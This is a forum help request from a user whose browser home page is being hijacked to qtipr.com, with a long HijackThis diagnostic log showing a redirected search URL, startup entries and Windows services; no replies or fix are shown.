    Remove qtipr.com (Solved)

    1. #1
      Darkor (User)
      Registered: Oct 2006
      Location: Spain
      Posts: 9

      Malware: Remove qtipr.com (Solved)

      Greetings. For days I've had an annoying piece of malware, or whatever it is, that hijacks my browser's home page every time I open it and takes me to www.qtipr.com. I've already run Malwarebytes and AdwCleaner, but although they find things, they never manage to get rid of the problem completely. What should I do? Thank you very much.

      This is the log that HijackThis gave me:

      Logfile of Trend Micro HijackThis v2.0.5
      Scan saved at 22:07:03, on 16/02/2017
      Platform: Unknown Windows (WinNT 6.02.1008)
      MSIE: Internet Explorer v11.0 (11.00.9600.18123)


      Boot mode: Normal

      Running processes:
      C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
      C:\Program Files (x86)\Lenovo\PowerDVD10\PDVD10Serv.EXE
      C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
      C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
      C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
      C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
      C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
      C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
      C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
      C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
      C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\CCLibrary.exe
      C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\libs\node.exe
      C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
      C:\Users\Alberto\Desktop\HijackThis.exe

      R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q={searchTerms}
      R1 - HKCU\Software\Microsoft\Internet Explorer\Main,SearchAssistant = Google
      R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = Google
      R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = Google
      R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
      R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = Google
      R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = Rambler/search
      R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = Rambler/search
      R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
      R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
      R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
      O2 - BHO: Skype for Business Click to Call BHO - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll
      O2 - BHO: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\PROGRA~2\MICROS~1\Office15\GROOVEEX.DLL
      O4 - HKLM\..\Run: [UpdateP2GShortCut] "C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Lenovo\Power2Go" UpdateWithCreateOnce "SOFTWARE\CyberLink\Power2Go\5.0"
      O4 - HKLM\..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
      O4 - HKLM\..\Run: [AdobeCS6ServiceManager] "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
      O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
      O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
      O4 - HKLM\..\Run: [Adobe Creative Cloud] "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
      O4 - HKCU\..\Run: [Power2GoExpress] NA
      O4 - HKCU\..\Run: [HP ENVY 4500 series (NET)] "C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN55Q341TN05X4:NW" -scfn "HP ENVY 4500 series (NET)" -AutoStart 1
      O4 - HKCU\..\Run: [Chromium] "c:\users\alberto\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
      O4 - HKCU\..\Run: [TalkHelper] "C:\Program Files (x86)\TalkHelper Call Recorder for Skype\TalkHelper.exe" /autostart
      O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
      O4 - HKCU\..\RunOnce: [Application Restart #2] C:\Users\Alberto\AppData\Local\Pokki\Engine\HostAppService.exe --disable-internal-flash --noerrdialogs --no-message-box --disable-extensions --disable-web-security --disable-web-resources --disable-client-side-phishing-detection --enable-file-cookies --disable-sync --disable-breakpad --disable-bundled-ppapi-flash --disable-sync-tabs --disable-speech-input --disable-custom-jumplist --process-per-tab --debug-devtools-frontend="C:\Users\Alberto\AppData\Local\Pokki\Engine\inspector" --no-first-run --lang=en-US --disable-component-update --disable-prompt-on-repost --no-startup-window --disable-translate --disable-logging --disable-desktop-notifications --disable-gpu-process-prelaunch --flag-switches-begin --flag-switches-end --restore-last-session
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [AdobeBridge] (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [Power2GoExpress] NA (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [HP ENVY 4500 series (NET)] "C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN55Q341TN05X4:NW" -scfn "HP ENVY 4500 series (NET)" -AutoStart 1 (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [Chromium] "c:\users\alberto\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [TalkHelper] "C:\Program Files (x86)\TalkHelper Call Recorder for Skype\TalkHelper.exe" /autostart (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\RunOnce: [Application Restart #2] C:\Users\Alberto\AppData\Local\Pokki\Engine\HostAppService.exe --disable-internal-flash --noerrdialogs --no-message-box --disable-extensions --disable-web-security --disable-web-resources --disable-client-side-phishing-detection --enable-file-cookies --disable-sync --disable-breakpad --disable-bundled-ppapi-flash --disable-sync-tabs --disable-speech-input --disable-custom-jumplist --process-per-tab --debug-devtools-frontend="C:\Users\Alberto\AppData\Local\Pokki\Engine\inspector" --no-first-run --lang=en-US --disable-component-update --disable-prompt-on-repost --no-startup-window --disable-translate --disable-logging --disable-desktop-notifications --disable-gpu-process-prelaunch --flag-switches-begin --flag-switches-end --restore-last-session (User '?')
      O4 - S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480 Startup: Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (User '?')
      O4 - Startup: Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
      O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE/3000
      O8 - Extra context menu item: Se&nd to OneNote - res://C:\Program Files\Microsoft Office 15\Root\Office15\ONBttnIE.dll/105
      O9 - Extra button: HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe
      O9 - Extra 'Tools' menuitem: HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe
      O9 - Extra button: Enviar a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIE.dll
      O9 - Extra 'Tools' menuitem: &Enviar a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIE.dll
      O9 - Extra button: Complemento Hacer clic para llamar de Lync - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll
      O9 - Extra 'Tools' menuitem: Complemento Hacer clic para llamar de Lync - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll
      O9 - Extra button: Notas &vinculadas de OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
      O9 - Extra 'Tools' menuitem: Notas &vinculadas de OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
      O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
      O18 - Protocol: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files (x86)\Microsoft Office\Office15\MSOSB.DLL
      O18 - Filter hijack: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\MSOXMLMF.DLL
      O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
      O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
      O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
      O23 - Service: AdobeUpdateService - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
      O23 - Service: @%SystemRoot%\system32\aelupsvc.dll,-1 (AeLookupSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Adobe Genuine Software Integrity Service (AGSService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
      O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
      O23 - Service: @%systemroot%\system32\appidsvc.dll,-100 (AppIDSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\appinfo.dll,-100 (Appinfo) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\AppReadiness.dll,-1000 (AppReadiness) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\appxdeploymentserver.dll,-1 (AppXSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\AudioEndpointBuilder.dll,-204 (AudioEndpointBuilder) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\audiosrv.dll,-200 (Audiosrv) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\AxInstSV.dll,-103 (AxInstSV) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\bdesvc.dll,-100 (BDESVC) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\bfe.dll,-1001 (BFE) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\qmgr.dll,-1000 (BITS) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%windir%\system32\bisrv.dll,-100 (BrokerInfrastructure) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\browser.dll,-100 (Browser) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: BTDevManager - Unknown owner - C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe
      O23 - Service: @%SystemRoot%\System32\BthHFSrv.dll,-103 (BthHFSrv) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\bthserv.dll,-101 (bthserv) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\certprop.dll,-11 (CertPropSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
      O23 - Service: @%SystemRoot%\system32\cryptsvc.dll,-1001 (CryptSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @C:\WINDOWS\system32\CxAudMsg64.exe,-100 (CxAudMsg) - Unknown owner - C:\WINDOWS\system32\CxAudMsg64.exe (file missing)
      O23 - Service: @combase.dll,-5012 (DcomLaunch) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\defragsvc.dll,-101 (defragsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\das.dll,-100 (DeviceAssociationService) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\umpnpmgr.dll,-100 (DeviceInstall) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\dhcpcore.dll,-100 (Dhcp) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\UtcResources.dll,-3001 (DiagTrack) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\dnsapi.dll,-101 (Dnscache) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\dot3svc.dll,-1102 (dot3svc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\dps.dll,-500 (DPS) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\DeviceSetupManager.dll,-1000 (DsmSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\eapsvc.dll,-1 (Eaphost) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
      O23 - Service: Elan Service (ETDService) - ELAN Microelectronics Corp. - C:\Program Files\Elantech\ETDService.exe
      O23 - Service: @%SystemRoot%\system32\wevtsvc.dll,-200 (EventLog) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @comres.dll,-2450 (EventSystem) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
      O23 - Service: @%systemroot%\system32\fdPHost.dll,-100 (fdPHost) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\fdrespub.dll,-100 (FDResPub) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\fhsvc.dll,-101 (fhsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\FntCache.dll,-100 (FontCache) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @gpapi.dll,-112 (gpsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Servicio de Google Update (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      O23 - Service: Servicio de Google Update (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      O23 - Service: @%SystemRoot%\System32\hidserv.dll,-101 (hidserv) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\kmsvc.dll,-6 (hkmsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\ListSvc.dll,-100 (HomeGroupListener) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\provsvc.dll,-100 (HomeGroupProvider) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: HP Support Solutions Framework Service (HPSupportSolutionsFrameworkService) - HP Inc. - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
      O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
      O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\ikeext.dll,-501 (IKEEXT) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
      O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
      O23 - Service: @%SystemRoot%\system32\iphlpsvc.dll,-500 (iphlpsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
      O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
      O23 - Service: @comres.dll,-2946 (KtmRm) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\srvsvc.dll,-100 (LanmanServer) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\wkssvc.dll,-100 (LanmanWorkstation) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: Lenovo System Agent Service - LENOVO INCORPORATED. - C:\Program Files\Lenovo\iMController\SystemAgentService.exe
      O23 - Service: @%SystemRoot%\System32\GeofenceMonitorService.dll,-1 (lfsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\lltdres.dll,-1 (lltdsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\lmhsvc.dll,-101 (lmhosts) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
      O23 - Service: @%windir%\system32\lsm.dll,-1001 (LSM) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
      O23 - Service: @%systemroot%\system32\mmcss.dll,-100 (MMCSS) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\FirewallAPI.dll,-23090 (MpsSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\iscsidsc.dll,-5000 (MSiSCSI) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\msimsg.dll,-27 (msiserver) - Unknown owner - C:\WINDOWS\system32\msiexec.exe
      O23 - Service: @%SystemRoot%\system32\qagentrt.dll,-6 (napagent) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\ncasvc.dll,-3009 (NcaSvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\ncbservice.dll,-500 (NcbService) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\NcdAutoSetup.dll,-100 (NcdAutoSetup) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\netman.dll,-109 (Netman) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\netprofmsvc.dll,-202 (netprofm) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\nlasvc.dll,-1 (NlaSvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\nsisvc.dll,-200 (nsi) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: NVIDIA Network Service (NvNetworkService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
      O23 - Service: NVIDIA Streamer Service (NvStreamSvc) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\WINDOWS\system32\nvvsvc.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\pnrpsvc.dll,-8004 (p2pimsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\p2psvc.dll,-8006 (p2psvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\pcasvc.dll,-1 (PcaSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\sysWow64\perfhost.exe,-2 (PerfHost) - Unknown owner - C:\WINDOWS\SysWow64\perfhost.exe
      O23 - Service: @%systemroot%\system32\pla.dll,-500 (pla) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\umpnpmgr.dll,-200 (PlugPlay) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\pnrpauto.dll,-8002 (PNRPAutoReg) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\pnrpsvc.dll,-8000 (PNRPsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\polstore.dll,-5010 (PolicyAgent) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\umpo.dll,-100 (Power) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll,-1 (PrintNotify) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\profsvc.dll,-300 (ProfSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\qwave.dll,-1 (QWAVE) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%Systemroot%\system32\rasauto.dll,-200 (RasAuto) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%Systemroot%\system32\rasmans.dll,-200 (RasMan) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%windir%\system32\RpcEpMap.dll,-1001 (RpcEptMapper) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
      O23 - Service: @combase.dll,-5010 (RpcSs) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
      O23 - Service: Conexant SmartAudio service (SAService) - Conexant Systems, Inc. - C:\WINDOWS\system32\SAsrv.exe
      O23 - Service: @%SystemRoot%\System32\SCardSvr.dll,-1 (SCardSvr) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\ScDeviceEnum.dll,-100 (ScDeviceEnum) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\schedsvc.dll,-100 (Schedule) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\certprop.dll,-13 (SCPolicySvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\seclogon.dll,-7001 (seclogon) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\Sens.dll,-200 (SENS) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\sensrsvc.dll,-1000 (SensrSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\SessEnv.dll,-1026 (SessionEnv) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\ipnathlp.dll,-106 (SharedAccess) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\shsvcs.dll,-12288 (ShellHWDetection) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
      O23 - Service: @%SystemRoot%\System32\smphost.dll,-102 (smphost) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
      O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
      O23 - Service: @%systemroot%\system32\ssdpsrv.dll,-100 (SSDPSRV) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\sstpsvc.dll,-200 (SstpSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wiaservc.dll,-9 (stisvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\StorSvc.dll,-100 (StorSvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\svsvc.dll,-101 (svsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: SwitchBoard - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
      O23 - Service: @%SystemRoot%\System32\swprv.dll,-103 (swprv) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\sysmain.dll,-1000 (SysMain) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%windir%\system32\SystemEventsBrokerServer.dll,-1001 (SystemEventsBroker) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\TabSvc.dll,-100 (TabletInputService) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\tapisrv.dll,-10100 (TapiSrv) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\termsrv.dll,-268 (TermService) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\themeservice.dll,-8192 (Themes) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\mmcss.dll,-102 (THREADORDER) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%windir%\system32\TimeBrokerServer.dll,-1001 (TimeBroker) - Unknown owner - C:\WINDOWS\system32\svchost.exe
